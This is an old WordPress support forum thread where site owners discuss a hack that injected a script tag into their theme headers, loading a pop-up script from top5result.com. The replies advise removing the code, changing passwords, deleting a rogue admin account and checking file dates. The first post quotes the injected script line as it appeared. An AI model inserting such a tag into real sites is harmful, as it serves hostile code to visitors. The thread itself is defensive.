Malware Script Suddenly appears!! Help? (8 posts)

  1. pemj
    Posted 6 years ago #

    I have a malicious pop-op that appears on my site, and i've found the code when i view source. It's the reference to "top5result.com/promo..." that is messing things up!!!

    <!-- Framework CSS -->
    <link rel="stylesheet" href="http://pauljohnston.com/wp-content/themes/gridblog/blueprint/screen.css" type="text/css" media="screen, projection" />
    <strong><!-- sidebar script --><head><script type="text/javascript" src="http://top5result.com/promo/bar.js"></script></head></strong>
    <link rel="stylesheet" href="http://pauljohnston.com/wp-content/themes/gridblog/blueprint/print.css" type="text/css" media="print" />
    <!--[if IE]><link rel="stylesheet" href="http://pauljohnston.com/wp-content/themes/gridblog/blueprint/ie.css" type="text/css" media="screen, projection" /><![endif]-->

    My problem is that i can't figure out where this code exists to remove it. Can anyone suggest anything? Curiously, the link only seems to trigger upon redirect from another site - but regardless, I want to get rid of it!

    Many thanks!!!!

  2. pemj
    Posted 6 years ago #

    WHOOOOPS - I figured it out.

    sorry to swallow bandwidth.

  3. pennygould
    Posted 6 years ago #

    I had the same problem!!! Creeps!!! I was able to remove the line of code from my header. I also changed my password. The problem hasn't come back, knock on wood! Top5Result.com should be avoided due to this malware problem!

  4. cmseocom
    Posted 6 years ago #

    They did it to me too, same hack. I also found a user set up as Admin that I had to delete and then changed my passwords.

  5. nuriha
    Posted 6 years ago #

    could someone please let me know how they solved this? i'm having a similar problem - a script running on my blog from worldwebworld.ru and i have no idea where/how to locate the code so i can remove it. trying to avoic having to reinstall WP. thanks in advance!

    the full script is:


  6. threechatons
    Posted 6 years ago #

    i have no idea where/how to locate the code

    Check out http://www.squidoo.com/how-to-find-a-malware-script - hopefully that will help you.

  7. DewPointProductions
    Posted 5 years ago #

    nuhira, if you have an ftp client and you're looking at your files look for files that have modified dates that look out of place. If you set your site / theme up on a particular date and almost all files have the date you set things up on, look to see if there's a later date. That's probably the date that your site was hacked and the file that was hacked.

    then just open that file and look for the code and delete it.

  8. Mark Ratledge
    Forum Moderator
    Posted 5 years ago #

    @DewPointProductions; this is a 10 month old thread....

Topic Closed

This topic has been closed to new replies.

About this Topic